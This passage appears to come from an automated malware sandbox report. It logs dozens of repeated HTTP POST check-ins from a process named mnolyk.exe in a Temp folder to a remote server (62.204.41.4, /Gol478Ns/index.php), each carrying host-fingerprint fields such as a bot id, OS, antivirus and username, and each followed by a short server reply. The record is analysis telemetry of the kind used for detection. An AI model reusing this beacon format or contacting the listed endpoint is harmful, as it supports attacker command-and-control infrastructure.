                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:46.940932989 CET336INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          203192.168.2.64992562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:47.192101002 CET337OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:47.257828951 CET337INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          204192.168.2.64992662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:49.382339954 CET338OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:49.448029041 CET338INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          205192.168.2.64992762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:49.659609079 CET339OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:49.723993063 CET339INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          206192.168.2.64992862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:49.894594908 CET340OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:49.957206964 CET340INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          207192.168.2.64992962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:50.134881973 CET341OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:50.201193094 CET341INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          208192.168.2.64993062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:50.374172926 CET342OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:50.436979055 CET342INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          209192.168.2.64993162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:50.612148046 CET343OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:50.677005053 CET343INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          21192.168.2.64973962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:55.935980082 CET126OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:55.999777079 CET126INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          210192.168.2.64993262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:50.862632036 CET343OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:50.924379110 CET344INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          211192.168.2.64993362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:51.094137907 CET345OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:51.158330917 CET345INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          212192.168.2.64993462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:51.338963032 CET346OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:51.403808117 CET346INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          213192.168.2.64993562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:51.579499960 CET347OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:51.642149925 CET347INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          214192.168.2.64993662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:51.820245981 CET348OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:51.883994102 CET348INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          215192.168.2.64993762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:52.063127041 CET349OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:52.127693892 CET349INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          216192.168.2.64993862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:52.305588007 CET350OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:52.370268106 CET350INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          217192.168.2.64993962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:52.546117067 CET351OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:52.609177113 CET351INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          218192.168.2.64994062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:52.794804096 CET352OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:52.857938051 CET352INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          219192.168.2.64994162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:53.041039944 CET353OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:53.106280088 CET353INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          22192.168.2.64974062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:56.170996904 CET127OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:56.234837055 CET127INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          220192.168.2.64994262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:53.287894011 CET354OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:53.352664948 CET354INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          221192.168.2.64994362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:53.532964945 CET355OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
